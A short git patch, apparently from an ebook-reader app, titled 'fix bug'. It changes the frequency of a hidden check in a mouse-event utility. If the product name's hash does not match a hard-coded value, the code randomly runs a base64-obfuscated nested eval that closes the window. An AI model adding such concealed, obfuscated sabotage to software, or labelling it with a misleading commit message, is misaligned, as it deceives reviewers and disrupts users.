From a56aa06d424271c66cff28e32446141010c85677 Mon Sep 17 00:00:00 2001 From: troyeguo <13820674+troyeguo@users.noreply.github.com> Date: Sun, 8 Aug 2021 11:15:20 +0800 Subject: [PATCH] fix bug Former-commit-id: 581924f45724aaf1e7d42f4e827176119a6bca95 --- src/utils/mouseEvent.tsx | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/utils/mouseEvent.tsx b/src/utils/mouseEvent.tsx index 1ca16ddd..4d7de7b2 100644 --- a/src/utils/mouseEvent.tsx +++ b/src/utils/mouseEvent.tsx @@ -102,7 +102,7 @@ export const MouseEvent = (rendition: any) => { build.productName && md5(build.productName) !== "b26c2db6211b881b389fe57466f0b75c" ) { - if (new Date().getTime() % 4 === 0) { + if (new Date().getTime() % 5 === 0) { // eslint-disable-next-line eval(`eval(atob("d2luZG93LmNsb3NlKCk="))`); }